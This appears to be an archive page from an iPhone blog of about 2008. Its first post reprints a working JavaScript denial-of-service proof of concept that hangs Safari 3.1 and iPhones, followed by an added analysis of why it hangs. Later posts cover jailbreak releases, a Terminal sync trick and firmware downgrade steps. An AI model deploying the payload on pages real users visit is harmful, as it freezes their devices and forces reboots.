Archive for iPhone

Safari 3.1 JavaScript DoS Released

Georgi Guninski has discovered a denial of service vulnerability in Safari 3.1 which causes the browser to hang rather than crash. The DoS also affects iPhones running firmware version 1.1.4 and all earlier versions.

When visiting a page that runs the JavaScript below, the iPhone locks up and the user has to reboot the phone. The current workaround is to disable JavaScript on your iPhone and/or iPod touch.

Below is the source of the PoC, which triggers the hang (not a crash).

Copyright Georgi Guninski

Cannot be used in vulnerability databases

Especially securityfocus/mitre/cve/cert
<script>
// One character above U+00FF; escape() encodes it as %u0101 (6 output characters).
var s=String.fromCharCode(257);
var ki="";
var me="";
var i;
// ki: 1024 copies of s. me: 1024 copies of ki, i.e. 1 Mi characters.
for(i=0;i<1024;i++)
{ki=ki+s;}
for(i=0;i<1024;i++)
{me=me+ki;}
// ov: s doubled 28 times (2^28 characters), then me appended 88 times.
var ov=s;
for(i=0;i<28;i++) ov += ov;
for(i=0;i<88;i++) ov += me;

alert("done generating");
// escape() must build a result six times the size of ov; this is where the browser hangs.
var fuckbill=escape(ov);
alert("done escape");
alert(fuckbill);
</script>
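To see why the PoC hangs rather than faults, here is an added example (not part of Guninski's PoC or of the original post) that runs the same string construction at a small scale and projects, in closed form, the sizes the real parameters reach. The function names and the small-scale parameters are this example's own.

```javascript
// Added example (not part of Guninski's PoC or the original post): the PoC's string
// construction, parameterised so it runs at a small scale, plus closed-form size
// projections for the real parameters. All function names here are this example's own.

// Same construction as the PoC: ki = kiLen copies of s, me = meReps copies of ki,
// ov = s doubled `doublings` times, then me appended `appends` times.
function buildPayload(charCode, kiLen, meReps, doublings, appends) {
  var s = String.fromCharCode(charCode);
  var ki = "";
  var me = "";
  var i;
  for (i = 0; i < kiLen; i++) ki += s;       // PoC: 1024
  for (i = 0; i < meReps; i++) me += ki;     // PoC: 1024, so me is 1 Mi characters
  var ov = s;
  for (i = 0; i < doublings; i++) ov += ov;  // PoC: 28, so ov reaches 2^28 characters
  for (i = 0; i < appends; i++) ov += me;    // PoC: 88, adding 88 Mi characters
  return ov;
}

// Closed form for buildPayload(...).length; no allocation needed.
function projectedLength(kiLen, meReps, doublings, appends) {
  return Math.pow(2, doublings) + appends * kiLen * meReps;
}

// escape() leaves alphanumerics and @*_+-./ alone, emits %XX (3 chars) for other code
// units below 256 and %uXXXX (6 chars) for code units of 256 and above. For a string
// made of one repeated character the output length is therefore a fixed multiple.
function escapeFactor(charCode) {
  return escape(String.fromCharCode(charCode)).length;
}

function escapedLength(charCode, kiLen, meReps, doublings, appends) {
  return escapeFactor(charCode) * projectedLength(kiLen, meReps, doublings, appends);
}

// Small-scale run of the real construction to confirm the closed forms:
// 2^3 + 2*4*4 = 40 characters, which escape() turns into 240 characters.
function smallScaleCheck() {
  var small = buildPayload(257, 4, 4, 3, 2);
  return small.length === projectedLength(4, 4, 3, 2) &&
         escape(small).length === escapedLength(257, 4, 4, 3, 2);
}

// The PoC's own parameters: 2^28 + 88*2^20 = 360,710,144 UTF-16 code units
// (688 MiB) before escape(), and a 2,164,260,864-unit result (about 4 GiB)
// that escape() has to build on top of it.
var fullChars = projectedLength(1024, 1024, 28, 88);
var fullEscaped = escapedLength(257, 1024, 1024, 28, 88);
console.log("small-scale check:", smallScaleCheck());
console.log("PoC string length:", fullChars, "escaped length:", fullEscaped);
```

Nothing in the construction corrupts memory; the browser simply spends its time and memory copying ever larger strings and then building a six-fold larger escaped copy, which is consistent with the reported hang rather than crash. Run the small-scale check in Node or any browser console; do not run the full parameters on a device you care about.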


iPhone / iPod touch 1.1.3 Jailbreak Released!

Nate True and the Dev Team have released a jailbreak for iPhones and iPod touches running firmware version 1.1.3. It is very similar to the jailbreak released earlier this week, but without the issue of your iPhone not working. Do note that this jailbreak requires your iPhone to be running firmware v1.1.2. iPhones running v1.1.1 will need to upgrade to v1.1.2, jailbreak, and then install the “BSD Subsystem” package. The reason is that the v1.1.3 jailbreak runs on the iPhone itself and is therefore platform independent.

This jailbreak does not upgrade the iPhone’s baseband, which breaks things like the “Locate Me” functionality in Google Maps. If you’re using a valid AT&T account, it is a good idea to upgrade to v1.1.3 and then downgrade to a jailbroken version of v1.1.2.

For those using an unlocked iPhone, I suggest staying away from firmware version 1.1.3 because it will re-lock your iPhone.

I have tested this jailbreak, and it definitely works as advertised. It does require some patience, but from my experience it didn’t have very many issues.

Download here:
http://security-protocols.com/files/Jailbreak-1.1.3.tar.gz

What did the five fingers say to the face? SLAP!

Rick James slaps v1.1.3


iPhone / iPod touch v1.1.3 Firmware Jailbroken

The guys over at Lonman06.com are claiming to have a jailbroken iPod touch running firmware version 1.1.3. They have provided a video as proof, which shows them moving icons around and launching Installer.app. They state that the jailbreak will not be made public until Apple releases the SDK. Below is a quote from their site:

“But now to the bad news…you still have to wait for it. The Jailbreak for 1.1.3 is not going to be released until Apple releases the Software Developers Kit (SDK) sometime in February. I’m not exactly sure why they are waiting to release the jailbreak. The only thing that comes to my mind is that they are doing this so Apple can’t patch the 1.1.3 Jailbreak when SDK is released.”

Source:
http://lonman06.com/2008/01/15/ipod-touch-jailbreak-and-113/


Sync your iPhone / iPod touch via Terminal


Erica Sadun has found a neat way to sync your iPhone and/or iPod touch from Terminal. The command makes the USB device re-enumerate, so iTunes sees it as freshly connected and starts a sync. Below are the steps:

1. Launch System Profiler: choose Apple > About This Mac > More Info.

2. Identify your device. In System Profiler, go to Hardware > USB and locate the iPod or iPhone you are using. Note its vendor (manufacturer) ID (0x05ac, Apple Computer, Inc.) and Product ID (0x1291 for my iPod touch).

3. Launch Terminal.

4. Find the utility: change directories to /System/Library/PrivateFrameworks/MobileDevice.framework/Versions/A/Resources/.

5. Run reenumerate with a single argument: the vendor ID, followed by a comma, followed by the product ID, e.g. ./reenumerate 0x05ac,0x1291

6. Give it a second; iTunes will then reload your iPhone / iPod touch and sync it.


How To downgrade your iPhone from 1.1.3 to 1.1.2


I’ve been getting a bunch of emails from people asking me how to downgrade from 1.1.3 back to 1.1.2. Erica Sadun has found a way, but unfortunately this method does not retain full functionality in 1.1.2: when using it, your iPhone will only function as an iPod touch.

I know it’s not perfect, but it’s about the best we have for now.

The instructions are as follows, courtesy of TUAW:

1. Get a fairly recent version of iPhuc. There are many versions floating around; make sure yours isn’t too old.

2. Locate your 1.1.1 iPod software bundle. On the Mac, this is in ~/Library/iTunes/(iPhone or iPod) Software Updates.

3. Extract the ipsw file. Create a new folder and unzip the 1.1.1 .ipsw file into it; an .ipsw is actually a renamed zip archive.

4. Locate the WTF file. Inside the unzipped ipsw folder, go down to Firmware > dfu and find the file whose name starts with WTF.

5. Connect your iPod or iPhone to the computer and launch iPhuc. Make sure that iPhuc connects to your unit and shows a normal prompt (one where you can issue the “ls” command and see the contents of your Media folder). If iTunes starts up, quit it.

6. Enter recovery mode. Type enterrecovery, press return, and quit iPhuc. Your unit should go into recovery mode.

7. Relaunch iPhuc. You should now see the recovery mode options. Enter filecopytophone followed by the path to the WTF file and press return. Then enter cmd go and press return. Quit iPhuc.

8. Launch iTunes. It will complain that it has found an iPod or iPhone in recovery mode; click OK. Then Option-click (Mac) or Shift-click (Windows) the Restore button.

9. Choose the 1.1.1 ipsw file. Locate the ipsw file (not the unzipped folder), select it, and start the restore. The screen *should* go white; that’s normal. If all is well, your iPhone or iPod touch will downgrade successfully.

10. Dealing with error 1015. If you run into error 1015, connect your newly restored unit to INdependence or try issuing cmd fsboot from iPhuc.
